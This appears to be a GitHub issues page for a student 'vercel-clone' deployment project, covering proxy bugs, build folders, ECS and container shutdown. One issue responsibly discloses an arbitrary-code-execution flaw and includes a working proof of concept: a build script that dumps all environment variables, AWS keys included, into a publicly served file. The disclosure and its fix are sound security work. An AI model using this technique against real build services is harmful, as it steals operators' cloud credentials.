
vercel-clone's Issues

Unable to access resource from S3 public server using reverse proxy

Output: [screenshot attached]

Code

const express = require("express");
const httpProxy = require("http-proxy");

const app = express();
const PORT = 8000;

const BASE_PATH =
    "https://faucet-client-deployments.s3.amazonaws.com/__outputs";

const proxy = httpProxy.createProxy();

app.use((req, res) => {
    const hostname = req.hostname;
    // First label of the host, e.g. "my-app" from my-app.example.com
    const subdomain = hostname.split(".")[0];

    // Custom Domain - DB Query

    const resolvesTo = `${BASE_PATH}/${subdomain}`;

    // Forward the request to the project's folder in the S3 bucket
    return proxy.web(req, res, { target: resolvesTo, changeOrigin: true });
});

proxy.on("proxyReq", (proxyReq, req, res) => {
    const url = req.url;
    console.log("url", url);
    console.log("proxyReq.path", proxyReq.path);
    if (url === "/") proxyReq.path += "index.html";
});

app.listen(PORT, () => console.log(`Reverse Proxy Running..${PORT}`));

S3 Bucket policy

{
    "Version": "2012-10-17",
    "Statement": [
        {
            "Sid": "AllowWebAccess",
            "Effect": "Allow",
            "Principal": "*",
            "Action": [
                "s3:GetObject",
                "s3:GetObjectVersion"
            ],
            "Resource": "arn:aws:s3:::faucet-client-deployments/*"
        }
    ]
}

Not dynamic for all builds

This project currently assumes a Vite project, which writes its build output to a dist folder. React projects created with Create React App emit a build folder instead, so the output directory needs to be detected or made configurable. This should be resolved if anyone picks it up; one possible approach is sketched below.
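A minimal sketch of one fix (resolveOutputDir is a hypothetical helper, not something in the repo): after the build finishes, pick whichever output folder actually exists instead of hard-coding dist.

const fs = require("fs");
const path = require("path");

// Hypothetical helper: return whichever build output folder exists.
// Vite emits dist/; Create React App emits build/.
function resolveOutputDir(projectRoot) {
    for (const candidate of ["dist", "build"]) {
        const full = path.join(projectRoot, candidate);
        if (fs.existsSync(full)) return full;
    }
    throw new Error("No build output folder (dist or build) found");
}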

Feat: Deploy ECS Cluster Separately Using AWS CDK

I've been exploring the project and its deployment setup. After reviewing the infrastructure and considering the potential for scalability and modularity, I believe there's an opportunity to enhance the deployment process.

Proposal:
Instead of deploying the ECS cluster directly within the project setup, I suggest deploying it separately using AWS CDK. This approach would offer several benefits:

  • Improved scalability and flexibility: Decoupling the ECS cluster deployment allows for independent scaling and management.
  • Simplified updates: With the ECS cluster managed separately, updates to the task ARN or other configurations can be performed more seamlessly without affecting the main project deployment.
  • Better resource management: Separating the ECS cluster deployment enables more granular control over resources and configurations, optimizing performance and cost-effectiveness.

Steps:

  1. Utilize AWS CDK to define and deploy the ECS cluster infrastructure (see the sketch after this list).
  2. Integrate the deployed ECS cluster with the main project setup by updating the necessary configurations (e.g., task ARN).
  3. Ensure seamless communication and interaction between the deployed ECS cluster and other project components.
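
As a starting point, here is a minimal CDK sketch of step 1 (stack, construct, and output names are illustrative, not taken from this repo): the cluster lives in its own stack and exports its ARN so the main project can reference it.

const cdk = require("aws-cdk-lib");
const ec2 = require("aws-cdk-lib/aws-ec2");
const ecs = require("aws-cdk-lib/aws-ecs");

class BuildClusterStack extends cdk.Stack {
    constructor(scope, id, props) {
        super(scope, id, props);

        // VPC and cluster are owned by this stack, independent of the main project
        const vpc = new ec2.Vpc(this, "BuildVpc", { maxAzs: 2 });
        const cluster = new ecs.Cluster(this, "BuildCluster", { vpc });

        // Export the cluster ARN so the API server can plug it into its RunTask config
        new cdk.CfnOutput(this, "ClusterArn", { value: cluster.clusterArn });
    }
}

const app = new cdk.App();
new BuildClusterStack(app, "BuildClusterStack");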

New Features

Add support for custom commands (a sketch follows):

  • To install
  • To run
  • To build

Support for both front-end and back-end code.
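
A rough sketch of how the build server might support custom commands (INSTALL_COMMAND, BUILD_COMMAND, and the clone location are assumptions, not existing project variables): read the commands from environment variables and fall back to the npm defaults.

const { execSync } = require("child_process");
const path = require("path");

const projectDir = path.join(__dirname, "output"); // assumed clone location
const installCmd = process.env.INSTALL_COMMAND || "npm install";
const buildCmd = process.env.BUILD_COMMAND || "npm run build";

// Run the user-supplied (or default) install and build commands
execSync(`${installCmd} && ${buildCmd}`, { cwd: projectDir, stdio: "inherit" });

Note that running user-supplied commands carries exactly the arbitrary-code-execution risk described in the vulnerability issue below, so it needs the same sandboxing.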

Possibly to add support for server functions?

I'm trying to come up with ways to support server functions, and my thought is to use a tool like aws-lambda-web-adapter, or maybe even SST. My idea is to deploy a static build just like it currently does, but also deploy the project to a Lambda function and somehow (I haven't figured it out yet) get the static build to understand that API routes and serverless functions are running elsewhere.

Containers are still running

Problem: Containers keep running even after the build process has completed.
Solution: Add publisher.disconnect(); at line 70 in /build-server/script.js.
This ensures the Docker container shuts down once the upload process is completed. 💯

  • publisher.disconnect() closes the connection to the Redis server; with no handles left open, the Node process exits and the container stops.
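
A sketch of what the tail of the script looks like with this fix (assuming an ioredis client, which is what a publisher.disconnect() call suggests; the channel name and log call are illustrative):

const Redis = require("ioredis");

const publisher = new Redis(process.env.REDIS_URL); // placeholder URL source

async function init() {
    // ... clone, build, and upload to S3 ...
    publisher.publish("logs", "Done"); // hypothetical final status log
    // Close the Redis connection; with no open handles left,
    // the Node process exits and the container stops.
    publisher.disconnect();
}

init();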

Vulnerability of arbitrary code execution due to Docker's build scripts

I want to point out a vulnerability that could compromise the Docker container and, through it, leak your AWS credentials. The issue arises from the fact that this project runs "npm run build" inside the Docker container to build and upload any GitHub repo. An attacker can make "npm run build" invoke a malicious script and thereby run arbitrary code in the Docker instance. This needed to be pointed out because I found some people hosting this project on the web with their AWS credentials; I waited for them to take down the live project before posting this issue.

While this project is good for education, it shouldn't be hosted on the web unless this weakness is taken care of. Since the project is used by many students, I am writing down the steps to show how easy it would be to compromise the Docker instance. I believe it is also a good learning opportunity to figure out ways to solve this.

Details

  • The build server's script.js runs the build script defined in package.json via npm run build.
  • An attacker can therefore publish a GitHub repo whose package.json points the build script at a malicious file:
{
  "name": "demo",
  "version": "1.0.0",
  "scripts": {
    "build": "node server.js"
  }
}
  • The malicious script server.js can then dump all the environment variables to a file that ends up uploaded to S3:
const fs = require('fs');
const path = require('path');

// Define the output directory and file name
const outputDir = path.join(__dirname, 'dist');
const outputFile = path.join(outputDir, 'env.txt');

// Ensure the 'dist' directory exists
if (!fs.existsSync(outputDir)) {
  fs.mkdirSync(outputDir, { recursive: true });
}

// Get all environment variables
const envVariables = Object.entries(process.env)
  .map(([key, value]) => `${key}=${value}`)
  .join('\n');

// Write the environment variables to the file
fs.writeFile(outputFile, envVariables, (err) => {
  if (err) {
    console.error('Error writing to file:', err);
  } else {
    console.log(`Environment variables have been written to ${outputFile}`);
  }
});
  • env.txt would then be accessible from the hosted URL (subdomain.example.com/env.txt), exposing all the environment variables, including the AWS credentials that were passed to the Docker instance for uploading repo files to S3.

Possible Solution:

Many ways exist to solve this issue. One would be to use the Docker container only to build the files and to upload them to S3 from outside Docker, which can be done with Docker's volume mount feature. A sketch follows.
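
A minimal host-side sketch of that idea (image name, bucket, paths, and project id are all illustrative): the container receives no credentials at all; the host mounts an output folder, lets the container build into it, then uploads with its own credentials.

const { execSync } = require("child_process");
const path = require("path");

const outputDir = path.join(process.cwd(), "output");
const projectId = "my-project"; // hypothetical project id

// Build inside the container; no AWS credentials or env vars are passed in
execSync(`docker run --rm -v "${outputDir}:/home/app/output" build-server-image`, {
    stdio: "inherit",
});

// Upload from the host, where the credentials actually live
execSync(
    `aws s3 cp "${outputDir}" "s3://my-bucket/__outputs/${projectId}" --recursive`,
    { stdio: "inherit" }
);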

I implemented this approach in a similar project after watching the @piyushgarg-dev Vercel video; you can refer to my repo js-webhost for it.
